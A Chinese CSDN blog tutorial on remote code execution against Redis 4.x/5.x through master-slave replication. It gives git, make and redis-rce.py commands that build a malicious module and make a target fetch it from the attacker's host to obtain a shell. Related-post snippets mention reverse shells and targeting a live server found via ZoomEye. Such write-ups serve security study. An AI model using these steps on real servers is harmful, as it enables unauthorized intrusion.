Redis主从复制RCE(4.x、5.x)

已于 2024-08-20 10:28:24 修改
阅读量78 收藏
点赞数 1
分类专栏: Redis漏洞 文章标签: redis 数据库 web安全 网络安全
于 2024-08-20 10:16:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57163799/article/details/141350896
版权

1.漏洞解析

1.1什么是主从复制

主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave)

主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。

1.2漏洞原理

Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。

在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的

2.利用条件

  • 未授权访问 : 未启用认证功能或认证密码为空,用户可直接连接
  • 授权访问 : 能通过弱口令认证或者直接知道认证密码访问到Redis服务器

3.利用方式

通过脚本实现一键自动化getshell:

脚本链接:GitHub - n0b0dyCN/RedisModules-ExecuteCommand: Tools, utilities and scripts to help you write redis modules!

1、攻击端生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand 
cd RedisModules-ExecuteCommand/ 
make

2、攻击端执行: python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

git clone https://github.com/Ridter/redis-rce.git 
cd redis-rce/ 
cp ../RedisModules-ExecuteCommand/src/module.so ./ 
pip install -r requirements.txt 
python redis-rce.py -r 靶机IP -p 6379 -L 攻击机IP -f module.so

执行效果如下:

4.总结

这里的Redis主从复制的利用只针对4.x与5.x的版本,如果版本不在这个范围,可以查看我的博客主页其他的Redis漏洞利用方式。

Redis未授权访问漏洞-CSDN博客

Redis Lua沙盒绕过RCE(CVE-2022-0543)-CSDN博客

不想秃头的烟花
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NoSQL之Redis主从复制集群部署.pdf
08-18
NoSQL之Redis主从复制集群部署,即通过搭建Redis主从复制来形成高可用性、高可扩展性的集群系统。在Redis集群中,一个主服务器可以有多个从服务器,主服务器负责处理写操作并复制数据到从服务器,而从服务器则用于...
深入剖析Redis主从复制.pdf
10-17
Redis 主从复制是一种常见的数据冗余和高可用性策略,它允许数据在多个Redis服务器之间复制,以确保即使主服务器发生故障,数据也能通过从服务器继续提供服务。本文将深入探讨Redis主从复制的机制,包括全同步和部分...
redis主从复制RCE 4.x/5.x
weixin_42140534的博客
12-22 694
0x01 主从复制说明 reids 虽然读取速度特别快,但也会产生读压力的,为了分担这个压力,redis支持主从复制redis的主从结构可以采用一主多从或者级联结构,redis组从复制根据是否全量可以分为全量同步和增量同步 全量同步 Redis全量复制一般发生在Slave初始化阶段,这时Slave需要将Master上的所有数据都复制一份。具体步骤如下: 从服务器连接主服务器,发送SYNC命令; 主服务器接收到SYNC命名后,开始执行BGSAVE命令生成RDB文件并使用缓冲区记录此后执行的所有写命令;
Redis主从复制实现RCE
rev1ve的博客
12-01 2406
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
redis主从复制
weixin_63231007的博客
02-28 1752
redis主从复制原理以及简单演示(环境真难搭)
记某次简单的从Redis弱口令到主从复制RCE
末初的CSDN博客
08-21 955
记一次从Redis弱口令到RCE
Redis基于主从复制RCE
m0_58596609的博客
10-13 2480
Redis基于主从复制RCE
redis4.x/5.x 基于主从复制 RCE 复现
sojrs_sec的博客
09-30 448
环境准备 这里我通过zoomeye找到一台服务器34.70.67.23,上面开了redis4.0.6服务 准备exp 自己的vps 1.1.1.1 git clone https://github.com/n0b0dyCN/redis-rogue-server 编译exp.so cd /root/redis/redis-rogue-server/RedisModulesSDK/exp make ...
Redis 4.x5.x 未授权访问漏洞(Redis基于主从复制RCE
黑白的博客
12-06 1982
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
Redis基于主从复制RCE(redis4.x 5.x)复现
ddr12231的博客
07-10 256
使用docker建立redis 拉取镜像 运行 查看 可以连接,存在未授权 https://github.com/Ridter/redis-rce 发送poc i:正向连接 r:反弹 反弹成功 转载于:https://www.cnblogs.com/mrhonest/p/11162735.html...
redis 主从复制 rce 和 题目复现
qq_41891666的博客
07-03 1442
0x01 RESP 协议 redis 客户端和服务端之间采用RESP 协议来通信,RESP 协议全称 REdis Serialization Protocol 理解 Redis 的 RESP 协议 搞清RESP 协议,就可以看懂 redis-rogue-server.py 中是怎么构造协议的了,以及怎么把redis 客户端命令转化成 通信时的 数据了 0x02 主从复制 中的FULLRESYNC (全局同步): 贴一篇文章,讲到很详细:Redis 全量同步解析 也就是说master 回复 +FULLR
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
LAMP架构+Redis主从复制.docx
10-08
LAMP架构+Redis主从复制 本文档主要介绍了LAMP架构的安装和配置,以及Redis主从复制的设置。LAMP架构是指Linux操作系统、Apache HTTP服务器、MySQL数据库和PHP编程语言的组合,而Redis则是一个开源的、基于内存的...
SpringBoot依赖之Spring Data Redis一有序集合Sorted Set
最新发布
ahauedu的专栏
08-19 674
​ 通过上述步骤,我们成功在 Spring Boot 项目中使用 Spring Data Redis 实现了对 Redis 有序集合(Sorted Set)类型的操作。您可以使用这些方法来处理排行榜、定时任务和延时队列的数据结构需求。​ 这是基本的有序集合Sorted Set相关操作,还是要结合具体的业务选择具体的存储类型,这样对于项目后期的迭代具有事半功倍的效果。所以项目前期的技术选型也很重要,不容忽视。可以关注我一起学习,一起为程序员职业生涯蓄能。
Redis单线程模式
m0_59680769的博客
08-15 376
单线程的程序是无法利用服务器的多核 CPU 的,所以。,更多情况下是受到内存大小和网络I/O的限制。
redis事件机制
笑笑布丁的博客
08-16 634
aeApiAddEvent、aeApiDelEvent:增加或删除一个监听对象。aeEventLoop:redis事件循环器,负责管理事件。aeFileEvent:存储一个文件描述符已注册的文件事件。aeApiPoll:阻塞进程,等待事件就绪或给定事件到期。aeApiCreate:初始化I/O复用机制上下文环境。aeTimeEvent:存储一个时间事件的信息。
Spring-data-redis
m0_68041576的博客
08-15 641
说明: 在 SpringBoot2.x 之后,原来使用的jedis 被替换为了 lettucejedis : 采用的直连,多个线程操作的话,是不安全的,如果想要避免不安全的,使用 jedis pool 连接池lettuce : 采用netty,实例可以再多个线程中进行共享,不存在线程不安全的情况!可以减少线程数据了@Bean//1.创建自定义模板类//配置json类型的序列化工具//这样key会用字符串方式保存/*** 测试自定义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值